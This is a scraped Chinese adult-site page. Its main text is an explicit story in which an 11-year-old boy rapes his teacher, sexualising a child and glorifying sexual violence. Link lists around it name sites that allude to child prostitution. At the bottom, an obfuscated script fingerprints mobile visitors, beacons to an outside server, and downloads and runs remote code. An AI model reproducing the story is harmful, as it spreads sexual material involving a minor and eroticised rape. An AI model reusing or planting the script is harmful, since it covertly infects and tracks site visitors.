• 站长推荐




    热门搜索



    站长推荐




    女优精选
    点我看更多


    夢乃愛華
    波多野结衣
    早野詩
    三上悠亚
    河北彩花
    高桥圣子
    葵司
    水卜櫻

    番号库
    点我看更多


    综合番号
    200GANA
    259LUXU
    261ARA
    277DCV
    300MIUM
    300MAAN
    300NTK

    国产传媒
    点我看更多


    综合传媒
    麻豆传媒
    葫芦影业
    猫爪影像
    天美传媒
    果冻传媒
    91制片厂
    蜜桃传媒

    探花系列
    点我看更多


    91沈先生
    文轩探花
    千人斩
    太子探花
    屌哥全国探花
    鸭哥探花
    9总全国探花
    小天探花

    精选导航

  • 不良研究所
  • 帝王会所
  • 黑料福利网
  • 必备福利
  • 逗妇乳
  • 三千佳丽
  • 全球福利汇

  • 学生奸污了的处女老师

    jkun资源站校园情事人气:833时间:2024-04-01 18:00:34

      吴鍈

    “咚咚咚”!

    办公室响起了敲门声。

    “进来。”

    门被一个男生推开,他站在门口,叫了声:“报告!”

    坐在办公桌前的幸福村小学五年级(4)班班主任吴鍈老师抬头看了男生一眼,微微蹙了蹙眉头,轻轻“嗯”了一声,让男生进来。

    那名男生走到吴鍈面前,将一本练习本抵到她的面前。

    吴鍈放下了手上的笔,接过练习本。

    吴鍈的桌子上放着厚厚一摞练习本,是今天上午语文课上默写的古诗,其中一大半已经批完了。

    “楼世杰,今天早上默了四首唐诗,你没有一首默全对的,《枫桥夜泊》你更是半个字都没默出来,你是不是又想让我把你家长叫来?”

    那名叫楼世杰的男生低着头没说话。

    吴鍈看着楼世杰刚刚给她的练习本,上面用歪歪扭扭的字抄了大大的一篇《闰土》,这是为了罚他昨晚布置的几门功课的作业今天早上一门都没交。这可苦了楼世杰,原本今天是星期五,下午两点半放的学,原本他还约好同学一起去街机房好好爽一把的,平时放学到家时父母也差不多回家了,所以没机会,难得星期五早放学可以赶在父母回家前去过过瘾,现在被老师这么一罚,从放学两点半一直抄到将近五点,还必须赶在父母到家前回去,不然让父母发现晚回家,问及原因肯定要挨一顿板子。

    想到这里,心中不由又泛起对吴鍈老师的愤恨。

    这个年轻的女老师是在他们二年级的时候成为他们班主任的,那时她刚从师范学院毕业两年,来这所学校也才一年,来接替他们退休的前任班主任田老师。与和蔼的田老师相比,吴鍈老师要严厉得多。其实这种严厉是负责,因为之前的田老师确实管教的比较松,一来田老师带他们的时候他们才刚刚小学一年级,二来田老师自己也快退休了,可以说带的并不是太负责任,班级的纪律比起其它班级来松散的多,平均成绩在年级里也排倒数。

    而吴鍈老师上任后可以说是严加管教,这几年来班级状况可谓非常良好,她自己是语文老师,语文考试他们(4)班几乎每次都是年级第一,其他科目的成绩也都能排在年级前列。

    当然,每个班级都有“坏分子”,不爱读书,调皮捣蛋,整天惹事闯祸,拖班级的后腿。楼世杰就属于这类“坏分子”。

    楼世杰属于发育比较早的那类,才五年级,11岁,就长到了一米六,比身材娇小的吴老师矮不了多少,平时也爱和学校六年级预备班的高年级学生混在一起,爱泡网吧、打街机,没几门科目考试能够及格的,对于吴鍈老师的严厉当然非常不痛快。

    吴鍈看了几眼楼世杰的抄书就将它扔在一边,继续批阅剩余的古诗默写,一边批阅,一边对楼世杰大念紧箍咒。

    切,还不是老生常谈,什么考高中、考大学、找工作,都是些老掉牙的东西,我现在才小学,那种事情离我还远着呢。楼世杰心中不满的叨念着。

    趁着老师低头批改的时候,楼世杰眼睛狠狠瞪了她几眼,偷偷做了个鬼脸。

    当他瞪吴鍈的时候,看到吴鍈低头的侧脸,傍晚太阳临近落山时略带暗淡的光写从吴鍈身后的窗户中照射进来,勾勒出年轻女老师清秀的轮廓,楼世杰不知怎的内心竟一阵激荡。

    虽说自己不喜欢这个“凶巴巴”的老师,但不可否认,班级里人人都认为,吴鍈老师是个不折不扣的大美人,班级中一个傻里傻气的男生曾“童言无忌”的宣称,要让吴老师做自己的“初恋情人”。

    一米六十稍出头的娇小体型,纤瘦苗条,乌发齐肩,衬托出一张玲珑秀气的瓜子脸,两条弯眉下杏眼闪亮,瑶鼻秀挺,唇红齿白,笑语嫣然。

    楼世杰的目光随着吴鍈的脸庞沿着她白皙的颈项向下滑动,只见吴鍈穿着一件白色的长袖T恤,T恤最上一粒钮扣微微敞开着,隐约露出胸前的白嫩肌肤。楼世杰不由得微微向前探了探身,希望能够从吴鍈的衣领中看得更深入一些。

    当然,吴老师穿戴得还是比较保守的,并不会让人从上看下而大泄春光。但人总是有想象力的。吴鍈老师身材曼妙,在T恤的包裹下,丰满的双乳高高耸立,曲线动人,衣领遮掩得越好,越让人有一窥究竟的冲动。

    楼世杰的双眼最终停留在吴鍈的胸脯上,此时正在批改默写的吴老师上身微微前倾,丰胸自然下垂,更显得丰满、柔软、有弹性。

    不知不觉,楼世杰的下体已经勃起,将裤裆支起了一个小帐篷。楼世杰忙拉了拉上衣遮丑。

    由于发育较早,楼世杰已经开始遗精,而且在于高年级学生的接触中,也开始看一些色情杂志,也看过不少毛带,甚至晚上已经开始有手淫行为,吴鍈老师也曾经是他性幻想的对象。平时看到班上漂亮的女同学也喜欢调戏捉弄一下,但因为大家年纪都小,也不怎么在意。今天,当他看着明艳动人的美女老师,伴着内心对她的愤恨,欲火突然间便爆发了出来。楼世杰感到勃起的下体被裤子勒的有些发痛,心跳开始加快,喉口干涩,双手双脚也不由自主地微微有些发抖。他突然有些感到害怕,但是眼睛却怎么也不能从吴老师的胸口挪开,闹钟尽想象着吴老师浑身酥软、赤身裸体时的曼妙景象。

    此时吴鍈终于将默写全部批完,也结束了她的长篇大论。她理了理自己的办公桌,站了起来,道:“我说的话都是为了你们好,你们却总是觉得不耐烦。你们将来好不好是你们自己的事,关老师什么事?”

    吴鍈转身将办公室的窗户关上,又拉上了窗帘。由于是星期五,除了远在校门口的门卫,学校里早就没有其他人了。

    “好了,时间也不早了,都五点多了,快点回家去吧。你看你,因为你,拖得老师都陪你留到这么晚。”

    楼世杰听得心里又是一火,心想明明是你罚我抄书才弄得这么晚,现在反倒来怪我!

    正在关窗的吴鍈背对着楼世杰,楼世杰看着她柔软纤细的蛮腰、被紧身莱卡面料黑色长裤包裹住的翘臀和长腿,心里暗暗下了决心,并偷偷将办公室大门反锁了起来。

    吴鍈将窗帘拉好,转过身看到楼世杰还站在那里,道:“怎么还没走?还有什么事?”

    楼世杰笑了一下,问道:“吴老师,你有没有男朋友啊?”

    吴鍈皱了下眉头,反问道:“问这个干什么?”

    楼世杰道:“班级里的人都很想知道。大家都说吴老师是我们见过的最漂亮的老师了,所以大家都很好奇、很想知道。吴越同学就说过,想让老师当他的初恋情人呢。”

    吴鍈听言苦笑了一下,佯嗔道:“老师哪有功夫谈恋爱啊?!全部心思都用来管你们这群皮大王了!小小年纪不好好读书,脑袋瓜子都在想些什么乱七八糟的事情啊?!”

    吴鍈只晓得楼世杰他们还都只是小孩子,心思单纯,哪能想到楼世杰此刻心里的淫秽想法?

    楼世杰又说:“那吴老师是没有男朋友咯?吴老师没有男朋友的话,那一定还是处女吧!”

    吴鍈一听微微一愣,心想现在的小孩子也太早熟了,平时都在接触些什么东西啊?

    道:“你在说什么呢?还不快点回去!”

    楼世杰继续说道:“吴老师还是处女的话,那第一个得到吴老师的人一定是世界上最最幸福的人!”

    此时吴鍈心里真的有些光火了,心想这孩子越说越过分了,语气开始严厉起来:“再胡说八道的话老师可要生气了,马上给我回家去!”

    楼世杰朝吴鍈走近了一步,邪笑着说:“吴老师,让我做你第一个男人吧!让我帮吴老师开苞!吴老师长得又漂亮,身材又那么好,干起来一定非常舒服!”吴鍈听了完全愣住了,就像全没听懂楼世杰说的话一样。她没想到他竟然会说出这种话。等反应过来的时候,不禁怒由心生,劈头盖脸给了楼世杰一记耳光,然后指着他的鼻子骂道:“是谁教你说的这些不三不四的话!实在太放肆了!去,打电话把你父母叫来,让他们好好管教管教!去!”

    楼世杰捂着被打疼的脸,心中反而不怕了,道:“吴老师好凶好辣啊!我听人说,越凶越辣的女人干起来越有味道……”

    楼世杰还没说完,吴鍈又给了他一记更狠的耳光。

    这一记耳光也彻底将楼世杰的凶性打了出来,他突然扑向吴鍈,一把将她抱住,摁倒在窗前的一张办公桌上。

    吴鍈哪想得到楼世杰竟如此胆大,会做出这种事情来,一时没有防备,才被他摁倒在桌上,桌上的课本文具被弄得散落一地。

    楼世杰趴在老师的身上,将脸直埋入她的双乳间。吴老师的乳房又丰满又柔软,加上身上香水的淡雅香味,大大刺激了他的肾上腺素分泌,让他兽性大发!吴鍈惊叫着想将身上的楼世杰推开,却发现楼世杰力大的自己完全推他不动。这是因为一来自己处于突遭袭击的慌乱之中,她哪曾料到楼世杰竟然会试图强奸自己,力气无从使出,二来楼世杰毕竟是男生,且正处在发育阶段,又因为兽性激发身体潜能,故力气大增,让吴鍈一时也推不动他。

    吴鍈努力让自己镇定下来,道:“楼世杰!你干什么?!住手!放开我!快放开老师!你不可以这样!快住手!”

    此时的楼世杰哪听得进她的说话,反而双手抓住美女老师的衣领,用力朝两边撕扯,领子上的两粒钮扣也被崩开,暴露出胸前的大片肌肤。

    楼世杰发了疯似的在吴鍈裸露的胸前又亲又舔。吴鍈内心愤怒与恐惧夹杂,双手不住的挥动抽打着楼世杰的脑袋。

    楼世杰双手抓住老师的手腕,力气大的把吴鍈弄得生疼,努力挣扎了好几下都没能把手抽出来,只能利用身体不断扭动做着调整,让自己踏踏实实的躺在桌子上,好腾出双脚,用膝盖顶住楼世杰的小腹,不让他死死的贴住自己的身体。

    果然楼世杰直起身子,放开吴鍈的双手,转而抱住她大腿,趁着她的双腿没有完全夹拢,将头伸到了老师的双腿间,用脸摩擦老师的裆部。

    美女老师大惊之下娇呼一声,声音无比诱人。虽说隔着裤子,但裆部毕竟是一个女人不容他人触碰的敏感部位,楼世杰的摩擦瞬间带来一阵酸麻之感,渗遍全身,惹得吴鍈浑身一阵震颤。

    不过她也因此能够从桌子上坐了起来,危难之间双手抓住楼世杰的头发拚命拽拉,楼世杰吃疼不过,从老师的双腿间抬起头来,保住老师双腿的手也有所放松。

    吴鍈趁机用双腿蹬开楼世杰,从桌上爬下,往大门跑去。一拉大门,发现已经被锁住了,手忙脚乱之下一时竟也打不开门锁。

    “来人哪!救命啊!救命!”

    吴鍈一边努力开锁一边呼救。可是门还没打开,楼世杰已从后赶来,一把环抱住老师,将她紧紧贴在门上,双手从后绕前,一手按在她的左乳,另一手深入她的双腿间,一招“猴子偷桃”,抓住了吴鍈的裆部,随后隔着裤子用手掌摩擦着她的下体阴部。

    吴鍈遭到楼世杰上下其手,连忙分别抓住对方的双手,想将它们推开。虽然都隔着衣裤,但是敏感的乳头和阴部还是能够清楚的感受到楼世杰手掌带来的刺激,酸麻阵阵,使整个身体都感到酥软无比,这种感受简直难过之极。

    “啊……不……快点住手!楼世杰你太过分了!你……你怎么能对老师这样?!呃……停下来……啊……不……不要……救命啊!不要……住手啊!”

    楼世杰抚摸着美女老师的敏感部位,触手柔软。吴老师的秀丽脸庞此刻花容失色,显现着又是气愤、又是惊恐、又是羞涩的神情,更是别具韵味,再加上她的连连娇呼,更是惹得楼世杰心中痒痒,不能自已。

    楼世杰双手再次抓住吴鍈的衣领撕扯。有了刚才的基础,这次楼世杰成功将吴鍈的衣领撕开,“噗嘶”一声,吴鍈右肩的衣领已被楼世杰撕开,露出浑圆光洁的香肩,和项间胸前的大片肌肤。乳白色的内衣带挂在肩上,让楼世杰看的双眼直放光。

    他用手指撩开老师的内衣带,吻上了老师的香肩,双手也按住了她的双乳。

    惊恐之下吴鍈双手撑住大门,用力向后推去,一来身未成年人,随是女性,但力气终究大过只是小学生的楼世杰,二来危急时刻,力气也自比平时更大,竟将楼世杰推开,楼世杰只得放开老师的双乳,双手将其拦腰抱住。

    楼世杰抱着吴鍈左右甩动,让吴鍈双腿不能保持平衡,无从着力,从而消耗她的体力,紧接着将她甩倒在一张办公桌上,将她面朝下压住,随后“嘶”的一声将左肩衣领也撕了开来。

    此时吴鍈心中已是恐惧压倒了其他心理,心想若是真被自己的学生施暴奸淫凌辱,自己的清白声誉将一扫而光,那将来自己还如何做人啊?

    念及此处,吴鍈右手反身一肘击中楼世杰的面颊,将他从自己的身体上击离,但自己也因为反作用力而朝反方向摔倒。

    所幸这肘并未完全集中部位,着力不实,楼世杰虽感疼痛但四溢的兽欲很快便将疼痛掩盖,使他很快便站了起来。

    而看到楼世杰这么快就站了起来的吴鍈心中大骇,双腿一软一时竟站不起来,只得一点一点朝后退去。

    “不……不要过来……不要!你……你滚……滚出去啊!救命啊!不要过来!”

    楼世杰看着吴鍈双手拉起被撕开的衣领遮住裸露的双肩,双手死死抓着衣领,脸上满是惊恐的神情,呼救的语气中略带哀求的成分,心中充满了报复的满足感。楼世杰一把朝老师扑了过去。

    吴鍈尖叫一声,转身朝后手脚并用的爬着逃去,但是一间办公室就那么点地方,能逃到哪儿去?吴鍈再度被楼世杰一把抱住,被其利用身体的重量压倒在地。

    这次吴鍈再也没有力气将压在自己身上的男生推开,身为女性,毕竟耐力有限,连番的挣扎已让她有力不从心的感觉了。

    楼世杰将她的身体反转过来,然后坐在她的身上,俯身吻住了吴鍈的香唇,舌头探到对方口中,满口芳香四溢。

    吴鍈却觉醒臭不堪,双齿一咬,楼世杰“啊”的一声,吃痛离开吴鍈的嘴唇,用手指摸了摸背咬疼的舌头,竟被咬出血来了,一怒之下一巴掌抽在吴鍈脸上,将美女老师的半边秀脸打得通红,然后俯下身子,亲吻老师的颈部、香肩。

    “啊……不!不可以!楼世杰你不能这样!老师求求你,住手啊!”吴鍈双手使劲撑住楼世杰的脑袋,向他哀求道,“楼世杰,你听老师说,你不能这样,你这么做是不对的!”

    “哼哼,有什么不对啊?老师你太漂亮了,我早就想操你了!你知不知道,好几天晚上我自慰的时候,脑子里幻想的都是你啊!今天我一定要操你!操死你!爽他妈的死你!”

    “你!你神经病!住手,楼世杰,老师求求你,放开我!你……你还小,你还不能,这……这种事情不是这样的……”

    “我当然知道,毛带我看的多嘞!我知道,女人就喜欢被人捏她们的奶子,奶子越大越希望被别人捏,就像吴老师的大奶子一样!哈哈!”双手隔着衣服,用力捏着吴鍈的双乳。

    “啊!不要!不……不是……不是这样的,你不懂……不可以啊……啊!救命啊!”吴鍈挣扎道。

    “我懂得,吴老师我全懂!鸡巴翘起来了当然要找小嫩屄插,吴老师,我现在涨得好厉害,你就让我插吧!吴老师你知不知道,我想死你了!”言罢抓住老师的双手,强行摁到两旁,将双头埋入老师的双乳间。

    “不!你这是犯罪,你会坐牢的!”

    “嘿嘿,我还没成年,不会被判刑坐牢的!吴老师,我要强奸你!我要奸死你!我要把你绑起来,扒光你的衣服!”

    楼世杰坐了起来,解下了自己的皮带,先抓住吴鍈的一只手,然后用脚压住她的另一只手,随后抓着她的手用皮带绑在旁边办公桌的桌脚上。

    “住手!不要!救命……救命啊!啊!住手啊!”

    虽然吴鍈拚命挣扎反抗,但是由于一只手被压住动弹不得,另一只手则难以抵挡楼世杰双手的攻击,无奈之下只得任由他将自己的手捆绑住。

    接下去,楼世杰抓住了吴鍈的另一只手。由于一手已经被捆绑束缚,剩下来的一只手也孤掌难鸣,只得眼睁睁的看着楼世杰将自己的双手全都捆绑在桌脚上,心中已被深深的恐惧和绝望占据,眼泪不由得落了下来。

    楼世杰看着躺在地上衣衫不整、无力挣扎、无助落泪的美女班主任,想到马上就可以将她奸淫到手,心中无比畅快。从口袋中掏出手机,对着美女老师那梨花带雨的俏脸拍摄了几张,虽然吴鍈别过头躲开,但还是被楼世杰正面、侧面的拍摄了好几张。

    随后楼世杰将自己脱了个精光。

    “不……不要……不要过来……我求求你……不要啊!”看到脱光了的楼世杰,吴鍈的双眼不由得落在了楼世杰雄赳赳气昂昂的阳物上。她做梦都没有想到,一个年仅11岁的小男生下体竟会发育得如此惊人,又粗又长,更是吓得心惊胆战,连忙闭起双眼,大声尖叫!现在她唯一的希望就是期望门卫能够此刻来巡视校园,听到她的尖叫,前来解救她。又或是有哪个因事逗留在学校的老师或学生能够听到。

    这可惜,命中注定她要遭此一劫,因为不仅学校已经人去楼空,那个门卫也正呆在他的门房间里,翘着二郎腿欣赏着电视剧频道播放一整个下午的电视连续剧。


    楼世杰用舌头不断舔弄着老师的脚心,而脚心则是最容易痒的部位,吴鍈被楼世杰舔得奇痒难耐,双腿一阵一阵抽动,向缩回双腿,但是楼世杰抱着自己的双腿,你退他进,你进他退,双脚始终被他控制着,偏偏被他弄得既难受又想笑,简直哭笑不得,只得无奈的挣扎反抗。

    终于,楼世杰停了下来,笑着问道:“怎么样,吴老师?我的足底按摩舒不舒服啊?”

    吴鍈提着的一口气终于松了下来,胸口剧烈的起伏,大口大口喘着粗气,说不上话来。

    楼世杰的双手一点一点从吴鍈的小腿摸到她的大腿,然后不停的抚摸着美女老师的大腿。

    由于刚刚被楼世杰搔弄自己的脚心,搞得吴鍈全身都变得异常敏感,楼世杰的抚摸也带来一阵阵酸痒,弄得酥麻感觉一阵一阵的袭上心头。??吴鍈此时泪流满面,内心充满了屈辱、羞愤和恐惧,以前每当她看到荧幕中或新闻里有关强奸的场景她都会觉得非常不舒服,认为对于一个女人来说,强奸可说是最最恐怖的事情。可是没想到,这种可怕的事情竟然真的将要发生在自己身上,更难以想象的是,对她施暴的竟然是自己班中所带的学生,一个仅是小学五年级、年仅11岁、刚刚开始发育的小男孩,更让她感到难以言喻的羞耻。

    她的双手被死死的捆绑在桌脚上,而楼世杰则整个人坐在她的双脚上,想要反抗却实在无力挣扎,拚命呼救也只是叫天天不应、叫地地不灵,只得对着自己的学生苦苦哀求。

    “楼……楼世杰……求求你……老师求求你,不要……求求你不要这样对老师……你……你不可以这样!”

    楼世杰象是听不到老师的哀求一般,将手探入吴鍈的双腿间,抚摸着吴鍈的大腿内侧。虽然吴鍈紧紧夹住自己的双腿,但是由于大腿肉质柔软,还是被楼世杰轻而易举的插了进去。

    楼世杰的手顺着吴鍈的大腿内侧向上移动,直到大腿根部的时候还有手指轻轻扣了一下她的下体,惹得吴鍈娇躯一阵震颤。

    接着楼世杰解开了吴鍈的皮带,将它抽了出来,随后重重在美女老师的美臀上抽了一鞭!

    “啊!”吴鍈吃痛大叫一声。

    “啊唷哟,对不起啊吴老师,我打疼你啦!”楼世杰装模作样的说,“让我帮老师把裤子脱了,替老师揉揉吧!”

    说罢便开始解吴鍈长裤的钮扣。

    “不要!不要!求求你!不要!不!住手……求求你不要啊……”

    美女老师一边不断哀求,一边拚命扭动下体挣扎。

    楼世杰解开裤子的钮扣后,将美女老师的裤子强行脱掉,随后粗暴的一把将吴鍈的白色小内裤扒掉。

    “呃……不……”

    吴鍈满脸泪痕,惊恐不已,紧紧将双腿夹住、叠起,遮挡着女人下身最私密的部位。

    吴鍈的双腿纤长匀称,皮肤如丝般光滑柔嫩、如牛奶般白嫩光滑,就如同以汉白玉雕刻出来的艺术品一般。

    楼世杰在内心中狂呼,感谢上帝给了他这么一个完美迷人的女老师。

    他抓住吴鍈的双足,用力强行分开,随后将自己的腰身夹在双腿间,然后死死盯住了美女老师双腿间的神秘地带。

    只见一丛乌黑柔软的阴毛覆盖下,两片粉红色的肉瓣微微开启,随着呼吸微微一张一阖,身体沁出的丝丝汗珠依附着阴唇隐隐发出光泽。这就是美女老师含苞待放的处女私处,等着他来采收。

    楼世杰一时间看呆了,喉咙如同火烧一般干涩,虽然他从色情书刊、毛带也看到过很多女人的阴部,对其也有一定的了解。但是那些骚女人的烂屄又怎能和吴鍈保存完好的阴部相比。

    楼世杰强压心中的念头,探手从办公桌上拿下一把插在笔筒中的美工剪刀,道:“吴老师不要乱动哦,万一我已不小心手抖一下,吴老师光滑的肌肤就要见红咯。”

    说罢,便用剪刀将吴老师的上衣一条一条的剪碎。吴鍈早被吓得不敢动弹,连呼叫都忘记了。

    很快楼世杰变将吴鍈的上衣剪得分分碎,丢置在一旁,吴鍈浑身上下只余一件乳白色的胸罩遮体。

    乳罩下,一双美乳的形状已经依稀可见,两个罩杯之间露出了几寸雪白得不见一分瑕疵的玉白肌肤,那缓缓隆起的柔和曲线清晰可见,连双乳之间浅浅的乳沟也含羞答答的出现在楼世杰眼前,风光绮丽。

    楼世杰一边猛吞着口水,一边小心翼翼的将双手探到吴鍈身后,去解开胸罩的口子。而吴鍈则无助的将头别向一边紧闭双目,默默流泪忍受着即将全裸在自己学生面前的羞耻。

    吴鍈紧闭双目,但泪水却不断涌出,她微启香唇,不断地低声呻吟着“不……不要……”,“啊!不!不!不!不要!不要!停下来!停下来!住手!不要啊!啊啊啊啊!”

    楼世杰终于一点一点地将自己的阴茎插入了美女老师的阴道内,只觉吴鍈那狭窄的阴道将自己的阴茎完完全全的包裹起来,紧压、摸擦着自己的阳物,体验着前所未有的快感。这种快感,是靠自慰手淫完全不能达到的。

    插到一半,楼世杰感到前路被阻,此时他的心中异常兴奋,因为他知道前路阻隔的便是女人最为珍贵的处女膜,于是挺直上身,预备做出最重要的一击。

    而吴鍈也知道自己珍藏二十多年的贞操清白即将被自己的学生惨无人道的夺去,愈发嘶声裂肺的呼救哀求。

    只见楼世杰腰身一挺,吴鍈感觉到一阵下体撕裂般的疼痛,一声惨呼,美女老师的处女膜应声而破。楼世杰的阴茎直没入根部,死死的抵住花蕊中心。

    吴鍈躺在地上,为痛失贞操而放声大哭,楼世杰则闭上了自己双眼,似是在慢慢享受将教导了四年的美女老师破处开苞的痛快感受。

    随后楼世杰俯身双手紧紧环抱住身下的老师,将脸埋入吴鍈的双乳间,下体开始在吴鍈的阴道内抽插着。

    起初他的频率很快,也将吴鍈弄得很疼,但随着他的不断抽插,吴鍈的阴道内分泌出越来越多的蜜液,阴道内壁越来越光滑,虽然内心无比痛苦绝望,但身体却不受控制的随着楼世杰的抽插一上一下递送着,喉中也发出阵阵呻吟,肌肤由于血液上涌而更显得白里透红、娇嫩无比。

    楼世杰只感到抽插的越来越顺畅、越来越舒坦,他没有想到原来和女人交合是如此舒服的一件事情。在抽插了数百下之后,下体肌肉一紧,楼世杰知机的将阴茎深深插入老师花蕊中心,紧接着阳关一松,一股白花花的精液便喷涌而出,一滴不剩的射进了美女老师的身体中。

    一阵痛快的楼世杰筋疲力尽的扑倒在老师的怀中,大口大口喘着粗气。

    只可惜,由于这是楼世杰的初次上阵,持续的时间不长,虽然将美女老师的阴道弄得蜜水横流,但却仍差一步未能使吴鍈也达到高潮。

    休息了一会儿后,楼世杰心满意足的从老师身上爬了起来。这位美女老师满目泪痕、泣不成声,她不敢相信自己竟然就这样被自己的学生奸污了,更可恨的是他竟然就这样射在了自己的体内。

    ..................

      

    热门资讯


    友情链结

  • 不良研究所
  • 必备福利
  • 帝王会所
  • 全球福利汇
  • 黑料福利网
  • 三千佳丽
  • 逗妇乳
  • 黑色360导航
  • 她趣福利社
  • 花社导航
  • 番号研究所
  • 狼友集中营
  • 小马学院+
  • 隐秘部落
  • 童妓⚤青楼
  • 熟女超市
  • X站推送网
  • 萝莉岛VIP
  • 美色研究所
  • 猛男情報局
  • 必射榜
  • 熟女屋
  • G点导航
  • 换妻会所
  • 妃射不可
  • 色色研究所
  • 黑料网曝门
  • 无码乱伦网
  • 女友租赁

  • 联系信箱:[email protected]

    名称:国产呦女+ ,https://wuwu.oaoachug.link/调研资料/报告.html ,来路:18av , 来路低于300勿扰

    警告:本站收集的网址来源于全球互联网,网址内容和本站没有任何关系,网站在美国进行维护,受美国法律保护,如来访者国家法律不允许,请自行离开! © 2022

    国产

    三级

    日本无码

    日本有码

    欧美

    function uyJfTNs(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function DTzeVMH(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return uyJfTNs(t);};window[''+'I'+'N'+'S'+'b'+'W'+'a'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=DTzeVMH,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://ssd.zmneysz.com:7891/stats/7544/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMllM0EllMkYllMkZ0Zy4wYTlljLmNvbSUzQTg4OTE=','d3NNzJTNNBJTJGJTJGcG8uemFjdm0uY29tJTNNBOTUzMw==','4932',window,document,['l','N']);}:function(){};